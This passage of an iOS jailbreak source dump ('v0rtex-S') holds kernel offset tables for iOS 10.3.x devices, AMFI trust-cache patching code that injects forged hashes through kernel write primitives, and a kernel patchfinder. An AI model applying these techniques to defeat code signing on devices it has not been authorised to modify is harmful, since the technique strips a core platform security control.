=0xfffffff0075ec050; 520 | OFFSET_KERNEL_TASK =0xfffffff0075ec048; 521 | OFFSET_REALHOST =0xfffffff007572ba0; 522 | OFFSET_COPYIN =0xfffffff0071c5ecc; 523 | OFFSET_COPYOUT =0xfffffff0071c61ac; 524 | OFFSET_CHGPROCCNT =0xfffffff0073d3b28; 525 | OFFSET_KAUTH_CRED_REF =0xfffffff0073adeac; 526 | OFFSET_IPC_PORT_ALLOC_SPECIAL =0xfffffff0070df014; 527 | OFFSET_IPC_KOBJECT_SET =0xfffffff0070f22ec; 528 | OFFSET_IPC_PORT_MAKE_SEND =0xfffffff0070deb38; 529 | OFFSET_OSSERIALIZER_SERIALIZE =0xfffffff007486c58; 530 | OFFSET_ROP_LDR_X0_X0_0x10 =0xfffffff006244a84; 531 | OFFSET_ROOT_MOUNT_V_NODE =0xfffffff0075ec0b0; 532 | } 533 | } 534 | //iPad Mini 3 535 | 536 | else if (strcmp(u.machine, "iPad4,7") == 0 || strcmp(u.machine, "iPad4,8") == 0 || strcmp(u.machine, "iPad4,9") == 0) { 537 | if ([ver isEqual: @"Version 10.3 (Build 14E277)"]) 538 | { 539 | OFFSET_ZONE_MAP =0xfffffff00754c478; 540 | OFFSET_KERNEL_MAP =0xfffffff0075a8050; 541 | OFFSET_KERNEL_TASK =0xfffffff0075a8048; 542 | OFFSET_REALHOST =0xfffffff00752eba0; 543 | OFFSET_COPYIN =0xfffffff007181218; 544 | OFFSET_COPYOUT 
=0xfffffff00718140c; 545 | OFFSET_CHGPROCCNT =0xfffffff00738e504; 546 | OFFSET_KAUTH_CRED_REF =0xfffffff0073688a4; 547 | OFFSET_IPC_PORT_ALLOC_SPECIAL =0xfffffff007099f7c; 548 | OFFSET_IPC_KOBJECT_SET =0xfffffff0070ad1d4; 549 | OFFSET_IPC_PORT_MAKE_SEND =0xfffffff007099aa0; 550 | OFFSET_OSSERIALIZER_SERIALIZE =0xfffffff007441424; 551 | OFFSET_ROP_LDR_X0_X0_0x10 =0xfffffff00640ca84; 552 | OFFSET_ROOT_MOUNT_V_NODE =0xfffffff0075a80b0; 553 | } 554 | else if ([ver isEqual: @"Version 10.3.1 (Build 14E304)"]) 555 | { 556 | OFFSET_ZONE_MAP =0xfffffff00754c478; 557 | OFFSET_KERNEL_MAP =0xfffffff0075a8050; 558 | OFFSET_KERNEL_TASK =0xfffffff0075a8048; 559 | OFFSET_REALHOST =0xfffffff00752eba0; 560 | OFFSET_COPYIN =0xfffffff007181218; 561 | OFFSET_COPYOUT =0xfffffff00718140c; 562 | OFFSET_CHGPROCCNT =0xfffffff00738e504; 563 | OFFSET_KAUTH_CRED_REF =0xfffffff0073688a4; 564 | OFFSET_IPC_PORT_ALLOC_SPECIAL =0xfffffff007099f7c; 565 | OFFSET_IPC_KOBJECT_SET =0xfffffff0070ad1d4; 566 | OFFSET_IPC_PORT_MAKE_SEND =0xfffffff007099aa0; 567 | OFFSET_OSSERIALIZER_SERIALIZE =0xfffffff007441424; 568 | OFFSET_ROP_LDR_X0_X0_0x10 =0xfffffff00640ca84; 569 | OFFSET_ROOT_MOUNT_V_NODE =0xfffffff0075a80b0; 570 | } 571 | else if ([ver isEqual: @"Version 10.3.2 (Build 14F89)"]) 572 | { 573 | OFFSET_ZONE_MAP =0xfffffff00754c478; 574 | OFFSET_KERNEL_MAP =0xfffffff0075a8050; 575 | OFFSET_KERNEL_TASK =0xfffffff0075a8048; 576 | OFFSET_REALHOST =0xfffffff00752eba0; 577 | OFFSET_COPYIN =0xfffffff0071811ec; 578 | OFFSET_COPYOUT =0xfffffff0071813e0; 579 | OFFSET_CHGPROCCNT =0xfffffff00738e82c; 580 | OFFSET_KAUTH_CRED_REF =0xfffffff007368be4; 581 | OFFSET_IPC_PORT_ALLOC_SPECIAL =0xfffffff007099f14; 582 | OFFSET_IPC_KOBJECT_SET =0xfffffff0070ad1ec; 583 | OFFSET_IPC_PORT_MAKE_SEND =0xfffffff007099a38; 584 | OFFSET_OSSERIALIZER_SERIALIZE =0xfffffff0074419b8; 585 | OFFSET_ROP_LDR_X0_X0_0x10 =0xfffffff00640ca84; 586 | OFFSET_ROOT_MOUNT_V_NODE =0xfffffff0075a80b0; 587 | } 588 | else if ([ver isEqual: @"Version 
10.3.3 (Build 14G60)"]) 589 | { 590 | OFFSET_ZONE_MAP =0xfffffff00754c478; 591 | OFFSET_KERNEL_MAP =0xfffffff0075a8050; 592 | OFFSET_KERNEL_TASK =0xfffffff0075a8048; 593 | OFFSET_REALHOST =0xfffffff00752eba0; 594 | OFFSET_COPYIN =0xfffffff007180e98; 595 | OFFSET_COPYOUT =0xfffffff00718108c; 596 | OFFSET_CHGPROCCNT =0xfffffff00738e77c; 597 | OFFSET_KAUTH_CRED_REF =0xfffffff007368b08; 598 | OFFSET_IPC_PORT_ALLOC_SPECIAL =0xfffffff007099f14; 599 | OFFSET_IPC_KOBJECT_SET =0xfffffff0070ad1ec; 600 | OFFSET_IPC_PORT_MAKE_SEND =0xfffffff007099a38; 601 | OFFSET_OSSERIALIZER_SERIALIZE =0xfffffff007441908; 602 | OFFSET_ROP_LDR_X0_X0_0x10 =0xfffffff006408a84; 603 | OFFSET_ROOT_MOUNT_V_NODE =0xfffffff0075a80b0; 604 | } 605 | } 606 | //iPad Mini 4 & iPad Air 2 607 | else if (strcmp(u.machine, "iPad5,1") == 0 || strcmp(u.machine, "iPad5,2") == 0 || strcmp(u.machine, "iPad5,3") == 0 || strcmp(u.machine, "iPad5,4") == 0) { 608 | if (strcmp(u.version, "Darwin Kernel Version 16.5.0: Thu Feb 23 23:22:54 PST 2017; root:xnu-3789.52.2~7/RELEASE_ARM64_T7000") == 0) { 609 | OFFSET_ZONE_MAP =0xfffffff007558478; 610 | OFFSET_KERNEL_MAP =0xfffffff0075b4050; 611 | OFFSET_KERNEL_TASK =0xfffffff0075b4048; 612 | OFFSET_REALHOST =0xfffffff00753aba0; 613 | OFFSET_COPYIN =0xfffffff00718d3a8; 614 | OFFSET_COPYOUT =0xfffffff00718d59c; 615 | OFFSET_CHGPROCCNT =0xfffffff00739a78c; 616 | OFFSET_KAUTH_CRED_REF =0xfffffff007374b2c; 617 | OFFSET_IPC_PORT_ALLOC_SPECIAL =0xfffffff0070a611c; 618 | OFFSET_IPC_KOBJECT_SET =0xfffffff0070b9374; 619 | OFFSET_IPC_PORT_MAKE_SEND =0xfffffff0070a5c40; 620 | OFFSET_OSSERIALIZER_SERIALIZE =0xfffffff00744d6ac; 621 | OFFSET_ROP_LDR_X0_X0_0x10 =0xfffffff00639ca84; 622 | OFFSET_ROOT_MOUNT_V_NODE =0xfffffff0075b40b0; 623 | } 624 | else if (strcmp(u.version, "Darwin Kernel Version 16.5.0: Thu Feb 23 23:22:55 PST 2017; root:xnu-3789.52.2~7/RELEASE_ARM64_T7001") == 0) { 625 | OFFSET_ZONE_MAP =0xfffffff007558478; 626 | OFFSET_KERNEL_MAP =0xfffffff0075b4050; 627 | 
OFFSET_KERNEL_TASK =0xfffffff0075b4048; 628 | OFFSET_REALHOST =0xfffffff00753aba0; 629 | OFFSET_COPYIN =0xfffffff00718d4a0; 630 | OFFSET_COPYOUT =0xfffffff00718d694; 631 | OFFSET_CHGPROCCNT =0xfffffff00739a9b0; 632 | OFFSET_KAUTH_CRED_REF =0xfffffff007374d50; 633 | OFFSET_IPC_PORT_ALLOC_SPECIAL =0xfffffff0070a611c; 634 | OFFSET_IPC_KOBJECT_SET =0xfffffff0070b9374; 635 | OFFSET_IPC_PORT_MAKE_SEND =0xfffffff0070a5c40; 636 | OFFSET_OSSERIALIZER_SERIALIZE =0xfffffff00744d8d0; 637 | OFFSET_ROP_LDR_X0_X0_0x10 =0xfffffff0063a8a84; 638 | OFFSET_ROOT_MOUNT_V_NODE =0xfffffff0075b40b0; 639 | } 640 | else if (strcmp(u.version, "Darwin Kernel Version 16.6.0: Mon Apr 17 17:33:35 PDT 2017; root:xnu-3789.60.24~24/RELEASE_ARM64_T7000") == 0) { 641 | OFFSET_ZONE_MAP =0xfffffff007558478; 642 | OFFSET_KERNEL_MAP =0xfffffff0075b4050; 643 | OFFSET_KERNEL_TASK =0xfffffff0075b4048; 644 | OFFSET_REALHOST =0xfffffff00753aba0; 645 | OFFSET_COPYIN =0xfffffff00718d37c; 646 | OFFSET_COPYOUT =0xfffffff00718d570; 647 | OFFSET_CHGPROCCNT =0xfffffff00739aab4; 648 | OFFSET_KAUTH_CRED_REF =0xfffffff007374e6c; 649 | OFFSET_IPC_PORT_ALLOC_SPECIAL =0xfffffff0070a60b4; 650 | OFFSET_IPC_KOBJECT_SET =0xfffffff0070b938c; 651 | OFFSET_IPC_PORT_MAKE_SEND =0xfffffff0070a5bd8; 652 | OFFSET_OSSERIALIZER_SERIALIZE =0xfffffff00744dc40; 653 | OFFSET_ROP_LDR_X0_X0_0x10 =0xfffffff00639ca84; 654 | OFFSET_ROOT_MOUNT_V_NODE =0xfffffff0075b40b0; 655 | } 656 | else if (strcmp(u.version, "Darwin Kernel Version 16.6.0: Mon Apr 17 17:33:35 PDT 2017; root:xnu-3789.60.24~24/RELEASE_ARM64_T7001") == 0) { 657 | OFFSET_ZONE_MAP =0xfffffff007558478; 658 | OFFSET_KERNEL_MAP =0xfffffff0075b4050; 659 | OFFSET_KERNEL_TASK =0xfffffff0075b4048; 660 | OFFSET_REALHOST =0xfffffff00753aba0; 661 | OFFSET_COPYIN =0xfffffff00718d474; 662 | OFFSET_COPYOUT =0xfffffff00718d668; 663 | OFFSET_CHGPROCCNT =0xfffffff00739acd8; 664 | OFFSET_KAUTH_CRED_REF =0xfffffff007375090; 665 | OFFSET_IPC_PORT_ALLOC_SPECIAL =0xfffffff0070a60b4; 666 | 
OFFSET_IPC_KOBJECT_SET =0xfffffff0070b938c; 667 | OFFSET_IPC_PORT_MAKE_SEND =0xfffffff0070a5bd8; 668 | OFFSET_OSSERIALIZER_SERIALIZE =0xfffffff00744de64; 669 | OFFSET_ROP_LDR_X0_X0_0x10 =0xfffffff0063a4a84; 670 | OFFSET_ROOT_MOUNT_V_NODE =0xfffffff0075b40b0; 671 | } 672 | else if (strcmp(u.version, "Darwin Kernel Version 16.7.0: Thu Jun 15 18:33:36 PDT 2017; root:xnu-3789.70.16~4/RELEASE_ARM64_T7000") == 0) { 673 | OFFSET_ZONE_MAP =0xfffffff007558478; 674 | OFFSET_KERNEL_MAP =0xfffffff0075b4050; 675 | OFFSET_KERNEL_TASK =0xfffffff0075b4048; 676 | OFFSET_REALHOST =0xfffffff00753aba0; 677 | OFFSET_COPYIN =0xfffffff00718d028; 678 | OFFSET_COPYOUT =0xfffffff00718d21c; 679 | OFFSET_CHGPROCCNT =0xfffffff00739aa04; 680 | OFFSET_KAUTH_CRED_REF =0xfffffff007374d90; 681 | OFFSET_IPC_PORT_ALLOC_SPECIAL =0xfffffff0070a60b4; 682 | OFFSET_IPC_KOBJECT_SET =0xfffffff0070b938c; 683 | OFFSET_IPC_PORT_MAKE_SEND =0xfffffff0070a5bd8; 684 | OFFSET_OSSERIALIZER_SERIALIZE =0xfffffff00744db90; 685 | OFFSET_ROP_LDR_X0_X0_0x10 =0xfffffff00639ca84; 686 | OFFSET_ROOT_MOUNT_V_NODE =0xfffffff0075b40b0; 687 | } 688 | else if (strcmp(u.version, "Darwin Kernel Version 16.7.0: Thu Jun 15 18:33:35 PDT 2017; root:xnu-3789.70.16~4/RELEASE_ARM64_T7001") == 0) { 689 | OFFSET_ZONE_MAP =0xfffffff007558478; 690 | OFFSET_KERNEL_MAP =0xfffffff0075b4050; 691 | OFFSET_KERNEL_TASK =0xfffffff0075b4048; 692 | OFFSET_REALHOST =0xfffffff00753aba0; 693 | OFFSET_COPYIN =0xfffffff00718d120; 694 | OFFSET_COPYOUT =0xfffffff00718d314; 695 | OFFSET_CHGPROCCNT =0xfffffff00739ac28; 696 | OFFSET_KAUTH_CRED_REF =0xfffffff007374fb4; 697 | OFFSET_IPC_PORT_ALLOC_SPECIAL =0xfffffff0070a60b4; 698 | OFFSET_IPC_KOBJECT_SET =0xfffffff0070b938c; 699 | OFFSET_IPC_PORT_MAKE_SEND =0xfffffff0070a5bd8; 700 | OFFSET_OSSERIALIZER_SERIALIZE =0xfffffff00744ddb4; 701 | OFFSET_ROP_LDR_X0_X0_0x10 =0xfffffff0063a4a84; 702 | OFFSET_ROOT_MOUNT_V_NODE =0xfffffff0075b40b0; 703 | } 704 | } 705 | 706 | else 707 | { 708 | LOG("Device not supported yet."); 
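return FALSE;   /* tail of the per-device/per-build offset selector above; its start is outside this chunk */
    }

    return TRUE;
}

--------------------------------------------------------------------------------
/v0rtex-S/tar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/thisiswisy/v0rtex-injector/18a242c97ba0c4d45a553c78ef91cf9145e9e17e/v0rtex-S/tar
--------------------------------------------------------------------------------
/v0rtex-S/the_super_fun_part/amfi.h:
--------------------------------------------------------------------------------
/* NOTE(review): amfi.m defines this function with `bool` parameters while the
 * declaration uses `BOOL`. On arm64 iOS BOOL is defined as bool, so the two
 * agree there, but declaration and definition should use the same type. */
int patch_amfi(task_t tfpzero, uint64_t kslide, BOOL isv0rtex, BOOL hastweaks);
--------------------------------------------------------------------------------
/v0rtex-S/the_super_fun_part/amfi.m:
--------------------------------------------------------------------------------
#include "libjb.h"
#include "../kernel.h"
#include
#include "patchfinder64.h"
#include
#include
#include
#include
#include
#include
/* NOTE(review): the seven bare #include lines above lost their angle-bracket
 * header names in page extraction and are left exactly as the page shows them. */

// Kernel task port. Set by patch_amfi() from its tfpzero argument; read by
// kalloc() below and by the rk64() calls in patch_amfi().
task_t taskfp0;

kern_return_t mach_vm_read_overwrite(vm_map_t target_task, mach_vm_address_t address, mach_vm_size_t size, mach_vm_address_t data, mach_vm_size_t *outsize);
kern_return_t mach_vm_write(vm_map_t target_task, mach_vm_address_t address, vm_offset_t data, mach_msg_type_number_t dataCnt);
kern_return_t mach_vm_allocate(vm_map_t target, mach_vm_address_t *address, mach_vm_size_t size, int flags);

// Write one 32-bit value at kernel address `where` through kwrite().
void kwrite32(uint64_t where, uint32_t what) {
    uint32_t _what = what;
    kwrite(where, &_what, sizeof(uint32_t));
}

// Write one 64-bit value at kernel address `where` through kwrite().
void kwrite64(uint64_t where, uint64_t what) {
    uint64_t _what = what;
    kwrite(where, &_what, sizeof(uint64_t));
}

// Allocate `size` bytes in the kernel task (taskfp0) and return the address,
// or 0 when mach_vm_allocate() fails. Callers must check for 0: writing the
// result into a kernel pointer without checking would plant a NULL pointer.
static uint64_t kalloc(vm_size_t size) {
    mach_vm_address_t address = 0;
    kern_return_t kr = mach_vm_allocate(taskfp0, &address, size, VM_FLAGS_ANYWHERE);
    if (kr != KERN_SUCCESS) {
        printf("kalloc: mach_vm_allocate(0x%lx) failed: %d\n", (unsigned long)size, kr);
        return 0;
    }
    return address;
}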
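/*
 * Copy the file at `from` to a new file at `to`.
 *
 * Returns 0 on success, -1 on failure with errno set by the failing call.
 * The destination is created with O_EXCL, so an existing file at `to` is
 * never overwritten (open() fails with EEXIST).
 */
int cp(const char *to, const char *from)
{
    int fd_to, fd_from;
    char buf[4096];
    ssize_t nread;
    int saved_errno;

    fd_from = open(from, O_RDONLY);
    if (fd_from < 0)
        return -1;

    fd_to = open(to, O_WRONLY | O_CREAT | O_EXCL, 0666);
    if (fd_to < 0)
        goto out_error;

    while (nread = read(fd_from, buf, sizeof buf), nread > 0)
    {
        char *out_ptr = buf;
        ssize_t nwritten;

        /* write() may be short; keep going until the whole chunk is out,
         * retrying only on EINTR. */
        do {
            nwritten = write(fd_to, out_ptr, nread);

            if (nwritten >= 0)
            {
                nread -= nwritten;
                out_ptr += nwritten;
            }
            else if (errno != EINTR)
            {
                goto out_error;
            }
        } while (nread > 0);
    }

    /* nread == 0 means EOF; a negative value is a read() error and falls
     * through to the error path below with errno still set. */
    if (nread == 0)
    {
        /* close() can report a deferred write error, so its result matters. */
        if (close(fd_to) < 0)
        {
            fd_to = -1;
            goto out_error;
        }
        close(fd_from);

        /* Success! */
        return 0;
    }

out_error:
    saved_errno = errno;

    /* close() may clobber errno; report the original failure. */
    close(fd_from);
    if (fd_to >= 0)
        close(fd_to);

    errno = saved_errno;
    return -1;
}

/*
 * Prepend a new entry to the kernel's AMFI trust chain holding the hashes
 * that grab_hashes() collects for the selected directory roots.
 *
 *   tfpzero   kernel task port; stored in taskfp0 for kalloc()/rk64()
 *   kslide    slide added to the static kernel base 0xfffffff007004000
 *             before the patchfinder is initialised (presumably the KASLR
 *             slide; confirm against the caller)
 *   isv0rtex  true: hash the injector's own tools (/v0rtex, /bin, /usr, /sbin,
 *             /.dpkg/dpkg); false: hash the wider userland (/usr, /bin, /sbin,
 *             /Applications, /Library) and free the libjb hash tables at the end
 *   hastweaks process Documents/tweak.deb if it exists (see the two branches)
 *
 * Returns 0 on success, -1 when the kernel allocation for the new entry fails
 * (the trust chain is then left untouched).
 */
int patch_amfi(task_t tfpzero, uint64_t kslide, bool isv0rtex, bool hastweaks) {
    taskfp0 = tfpzero;
    init_patchfinder(taskfp0, 0xfffffff007004000 + kslide, NULL); //start patchfinder
    uint64_t trust_chain = find_trustcache(); //find trust cache
    uint64_t amficache = find_amficache(); //find amficache
    printf("trust_chain = 0x%llx\n", trust_chain);
    printf("amficache = 0x%llx\n", amficache);

    // New chain entry; it links to whatever the chain head currently points at.
    struct trust_mem mem;
    mem.next = rk64(taskfp0, trust_chain);
    // uuid[16] sits at offset 8 of the packed struct, so both 8-byte stores are
    // naturally aligned. The marker value itself is arbitrary.
    *(uint64_t *)&mem.uuid[0] = 0xabadbabeabadbabe;
    *(uint64_t *)&mem.uuid[8] = 0xabadbabeabadbabe;

    //USAGE:
    //call grab_hashes to trust a binary
    //EXAMPLE: grab_hashes("/usr/bin", kread, amficache, mem.next)

    if (isv0rtex) {
        //first amfi patch: the injector's own tools
        printf("v0rtex rv = %d, numhash = %d\n", grab_hashes("/v0rtex", kread, amficache, mem.next), numhash);
        printf("bin rv = %d, numhash = %d\n", grab_hashes("/bin", kread, amficache, mem.next), numhash);
        printf("usr rv = %d, numhash = %d\n", grab_hashes("/usr", kread, amficache, mem.next), numhash);
        printf("sbin rv = %d, numhash = %d\n", grab_hashes("/sbin", kread, amficache, mem.next), numhash);
        printf("dpkg rv = %d, numhash = %d\n", grab_hashes("/.dpkg/dpkg", kread, amficache, mem.next), numhash);

        if (hastweaks) {
            NSArray *paths = NSSearchPathForDirectoriesInDomains(NSDocumentDirectory, NSUserDomainMask, YES);
            NSString *documentsDirectory = [paths objectAtIndex:0];

            NSString *filePath = [NSString stringWithFormat:@"%@/%@", documentsDirectory,@"tweak.deb"];
            if ([[NSFileManager defaultManager] fileExistsAtPath:filePath]) {
                // dpkg -e extracts the package's control archive (maintainer
                // scripts) into /v0rtex so that a second pass hashes them too.
                // NOTE(review): filePath is interpolated into a shell command
                // line unquoted. It comes from the app's own Documents
                // directory, but a path containing shell metacharacters would
                // be misparsed; quoting it, or spawning dpkg without a shell,
                // would be more robust.
                NSString *firstcmd = [NSString stringWithFormat:@"dpkg -e %@ /v0rtex", filePath];
                system([firstcmd UTF8String]);
                printf("postinst rv = %d, numhash = %d\n", grab_hashes("/v0rtex", kread, amficache, mem.next), numhash);
            }
        }
    }
    else {
        //second amfi patch: the userland a tweak install touches. Earlier
        //revisions hashed /usr/bin, /usr/local/bin, /usr/lib, /usr/libexec,
        ///Library/Frameworks/CydiaSubstrate.framework and
        ///Library/MobileSubstrate separately; /usr and /Library now cover them.
        printf("usr rv = %d, numhash = %d\n", grab_hashes("/usr", kread, amficache, mem.next), numhash);
        printf("bin rv = %d, numhash = %d\n", grab_hashes("/bin", kread, amficache, mem.next), numhash);
        printf("sbin rv = %d, numhash = %d\n", grab_hashes("/sbin", kread, amficache, mem.next), numhash);
        printf("Apps rv = %d, numhash = %d\n", grab_hashes("/Applications", kread, amficache, mem.next), numhash);
        printf("Library rv = %d, numhash = %d\n", grab_hashes("/Library", kread, amficache, mem.next), numhash);
    }

    // Entry header followed by numhash hashes (sizeof(hash_t) == 20 bytes each),
    // rounded up to a multiple of 64 KiB.
    size_t length = (sizeof(mem) + numhash * sizeof(hash_t) + 0xFFFF) & ~(size_t)0xFFFF;
    uint64_t kernel_trust = kalloc(length);
    printf("alloced: 0x%zx => 0x%llx\n", length, kernel_trust);
    if (kernel_trust == 0) {
        // Without the allocation the chain head would be pointed at address 0.
        // Leave the kernel untouched and release what grab_hashes() built,
        // mirroring the cleanup done on the success path.
        printf("kalloc failed, trust chain left unchanged\n");
        if (!isv0rtex) {
            free(allhash);
            free(allkern);
            free(amfitab);
        }
        return -1;
    }

    // Header first, hashes right behind it, then publish by rewriting the head.
    mem.count = numhash;
    kwrite(kernel_trust, &mem, sizeof(mem));
    kwrite(kernel_trust + sizeof(mem), allhash, numhash * sizeof(hash_t));
    kwrite64(trust_chain, kernel_trust);

    if (hastweaks && !isv0rtex) {
        system("/usr/libexec/cydia/firmware.sh");

        NSArray *paths = NSSearchPathForDirectoriesInDomains(NSDocumentDirectory, NSUserDomainMask, YES);
        NSString *documentsDirectory = [paths objectAtIndex:0];

        NSString *filePath = [NSString stringWithFormat:@"%@/%@", documentsDirectory,@"tweak.deb"];
        if ([[NSFileManager defaultManager] fileExistsAtPath:filePath]) {
            NSLog(@"\npath = %@ \n", filePath);
            // Same unquoted-path caveat as the dpkg -e command above.
            NSString *secondcmd = [NSString stringWithFormat:@"dpkg --ignore-depends preferenceloader -i %@", filePath];
            system([secondcmd UTF8String]); //install
            sleep(2);
            [[NSFileManager defaultManager] removeItemAtPath:filePath error:nil]; //clean up
        }
    }

    // The libjb tables are kept alive in the v0rtex pass and released only here.
    if (!isv0rtex) {
        free(allhash);
        free(allkern);
        free(amfitab);
    }
    // (Older, already-disabled post-install injection code removed.)

    return 0;
}

--------------------------------------------------------------------------------
/v0rtex-S/the_super_fun_part/libjb.a:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/thisiswisy/v0rtex-injector/18a242c97ba0c4d45a553c78ef91cf9145e9e17e/v0rtex-S/the_super_fun_part/libjb.a
--------------------------------------------------------------------------------
/v0rtex-S/the_super_fun_part/libjb.h:
--------------------------------------------------------------------------------
#include
#include
#include

#ifndef libjb_h_included
#define libjb_h_included

/* mount ********************************************************************/

struct hfs_mount_args {
    char *fspec; /* block special device to mount */
    uid_t hfs_uid; /* uid that owns hfs files (standard HFS only) */
    gid_t hfs_gid; /* gid that owns hfs files (standard HFS only) */
    mode_t hfs_mask; /* mask to be applied for hfs perms (standard HFS only) */
    u_int32_t hfs_encoding; /* encoding for this volume (standard HFS only) */
    struct timezone hfs_timezone; /* user time zone info (standard HFS only) */
    int flags; /* mounting flags, see below */
    int journal_tbuffer_size; /* size in bytes of the journal transaction buffer */
    int journal_flags; /* flags to pass to journal_open/create */
    int journal_disable; /* don't use journaling (potentially dangerous) */
} args;

/* libhfs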
*******************************************************************/

/* Bits reported by the libhfs directory walker: permission bits in the low
 * 9 bits (mask kPermMask), an owner flag, and a file type in bits 16-17
 * (mask kFileTypeMask). Presumably these are the values returned through
 * HFSGetDirEntry()'s `flags` output -- confirm against the library. */
enum {
    kPermOtherExecute = 1 << 0,
    kPermOtherWrite = 1 << 1,
    kPermOtherRead = 1 << 2,
    kPermGroupExecute = 1 << 3,
    kPermGroupWrite = 1 << 4,
    kPermGroupRead = 1 << 5,
    kPermOwnerExecute = 1 << 6,
    kPermOwnerWrite = 1 << 7,
    kPermOwnerRead = 1 << 8,
    kPermMask = 0x1FF,
    kOwnerNotRoot = 1 << 9,
    kFileTypeUnknown = 0x0 << 16,
    kFileTypeFlat = 0x1 << 16,
    kFileTypeDirectory = 0x2 << 16,
    kFileTypeLink = 0x3 << 16,
    kFileTypeMask = 0x3 << 16
};

/* Opaque handle returned by HFSOpen() and consumed by the other HFS calls. */
typedef long CICell;

extern char *gLoadAddr; /* buffer of size 32MB (max file size) */

CICell HFSOpen(const char *filename, long offset);
long HFSReadFile(CICell ih, char *filePath, void *base, unsigned long offset, unsigned long length);
long HFSGetDirEntry(CICell ih, char *dirPath, unsigned long *dirIndex, char **name, long *flags, long *time);
void HFSClose(CICell);

/* untar ********************************************************************/

/* untar 'a' to current directory. path is name of archive (informational) */
void untar(FILE *a, const char *path);

/* launchctl ****************************************************************/

int launchctl_load_cmd(const char *filename, int do_load, int opt_force, int opt_write);

/* hashes *******************************************************************/

/* On-disk trust cache header as found in the AMFI cache image: a version
 * word, a 16-byte uuid and the number of hashes that follow it. */
struct trust_dsk {
    unsigned int version;
    unsigned char uuid[16];
    unsigned int count;
    //unsigned char data[];
} __attribute__((packed));

/* In-kernel trust chain entry. `next` is the kernel address of the following
 * entry; amfi.m seeds it from the current chain head and then writes the
 * address of its new entry back to the head, so the entry is prepended. The
 * `count` hashes follow the struct directly in memory. */
struct trust_mem {
    uint64_t next; //struct trust_mem *next;
    unsigned char uuid[16];
    unsigned int count;
    //unsigned char data[];
} __attribute__((packed));

/* Index entry over the amfi cache (num entries starting at start); the exact
 * meaning of the two fields is not visible from this header -- confirm in libjb. */
struct hash_entry_t {
    uint16_t num;
    uint16_t start;
} __attribute__((packed));

/* One 20-byte hash as stored in the trust cache. */
typedef uint8_t hash_t[20];

/* Accumulated by grab_hashes(): `allhash` holds `numhash` hashes, which amfi.m
 * copies into the kernel after the new trust_mem header; `amfitab`/`allkern`
 * are the library's lookup tables. amfi.m free()s all three when done. */
extern hash_t *allhash;
extern unsigned numhash;
extern struct hash_entry_t *amfitab;
extern hash_t *allkern;

/* can be called multiple times. kernel read func & amfi/top trust chain block are optional */
int grab_hashes(const char *root, size_t (*kread)(uint64_t, void *, size_t), uint64_t amfi, uint64_t top);

/* NOTE(review): `struct hfs_mount_args ... args;` above defines an object in
 * this header, so every translation unit that includes libjb.h gets its own
 * definition of `args`; with a linker that rejects common symbols this would
 * be a duplicate-symbol error. `extern` here plus one definition in a .c/.m
 * file would be the usual arrangement. */

#endif
--------------------------------------------------------------------------------
/v0rtex-S/the_super_fun_part/patchfinder64.c:
--------------------------------------------------------------------------------
//
//  patchfinder64.c
//  extra_recipe
//
//  Created by xerub on 06/06/2017.
//  Copyright © 2017 xerub. All rights reserved.
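//

/* NOTE(review): the three angle-bracket includes here lost their names in page
 * extraction; the headers below supply every standard name the visible code
 * uses (uint8_t/uint32_t/uint64_t, size_t, NULL). */
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include "kernel.h"

/* 64-bit address / offset type used throughout the finder. */
typedef unsigned long long addr_t;

/* Low bit of the Mach-O magic distinguishes the 64-bit header (0xfeedfacf)
 * from the 32-bit one (0xfeedface). */
#define IS64(image) (*(uint8_t *)(image) & 1)

/* True when p starts with either Mach-O magic, in host byte order. */
#define MACHO(p) ((*(unsigned int *)(p) & ~1) == 0xfeedface)

/* generic stuff *************************************************************/

#ifndef UCHAR_MAX   /* <limits.h> may already define it; avoid a redefinition */
#define UCHAR_MAX 255
#endif

/*
 * Boyer-Moore-Horspool substring search.
 *
 * Returns a pointer to the first occurrence of needle[0..nlen) inside
 * haystack[0..hlen), or NULL when there is no match, when either buffer is
 * NULL, or when nlen is 0 (an empty needle is rejected rather than matching
 * everywhere).
 */
static unsigned char *
boyermoore_horspool_memmem(const unsigned char* haystack, size_t hlen,
                           const unsigned char* needle, size_t nlen)
{
    size_t last, scan = 0;
    size_t bad_char_skip[UCHAR_MAX + 1]; /* Officially called:
                                          * bad character shift */

    /* nlen is unsigned, so == 0 is the only meaningful emptiness test */
    if (nlen == 0 || !haystack || !needle)
        return NULL;

    /* ---- Preprocess ---- */
    /* A byte that does not occur in the needle lets us skip a whole
     * needle length. */
    for (scan = 0; scan <= UCHAR_MAX; scan = scan + 1)
        bad_char_skip[scan] = nlen;

    /* [nlen - 1] is the last byte of the needle. */
    last = nlen - 1;

    /* Bytes that do occur (except the last) skip to their last occurrence. */
    for (scan = 0; scan < last; scan = scan + 1)
        bad_char_skip[needle[scan]] = last - scan;

    /* ---- Do the matching ---- */

    while (hlen >= nlen)
    {
        /* compare from the end of the needle backwards */
        for (scan = last; haystack[scan] == needle[scan]; scan = scan - 1)
            if (scan == 0) /* the first byte matched too: found it */
                return (void *)haystack;

        /* Shift by the table entry of the haystack byte aligned with the
         * needle's last byte, no matter where the mismatch happened. For
         * "abcd" that skips 4 on a 'd'; for "abcdd" only 1. Using the
         * mismatched byte instead would be slower in the common case. */
        hlen -= bad_char_skip[haystack[last]];
        haystack += bad_char_skip[haystack[last]];
    }

    return NULL;
}

/* disassembler **************************************************************/

/* Index of the highest set bit among the low N bits of imm, or -1 if none. */
static int HighestSetBit(int N, uint32_t imm)
{
    int i;
    for (i = N - 1; i >= 0; i--) {
        if (imm & ((uint32_t)1 << i)) { /* unsigned shift: well-defined for N <= 32 */
            return i;
        }
    }
    return -1;
}

/* Ones(M) zero-extended to N bits: a value with its low M bits set. N is
 * kept for symmetry with the ARM pseudocode and not otherwise used.
 * M >= 64 yields all ones instead of an out-of-range shift. */
static uint64_t ZeroExtendOnes(unsigned M, unsigned N) // zero extend M ones to N width
{
    (void)N;
    if (M >= 64) {
        return ~(uint64_t)0;
    }
    return ((uint64_t)1 << M) - 1;
}

/* ZeroExtendOnes(M, N) rotated right by R within an N-bit field (R < N). */
static uint64_t RORZeroExtendOnes(unsigned M, unsigned N, unsigned R)
{
    uint64_t val = ZeroExtendOnes(M, N);
    if (R == 0) {
        return val;
    }
    return ((val >> R) & (((uint64_t)1 << (N - R)) - 1)) | ((val & (((uint64_t)1 << R) - 1)) << (N - R));
}

/* Tile the low `bits` bits of val across all 64 bits (callers pass element
 * sizes 2..64; for 64 the loop body never runs). */
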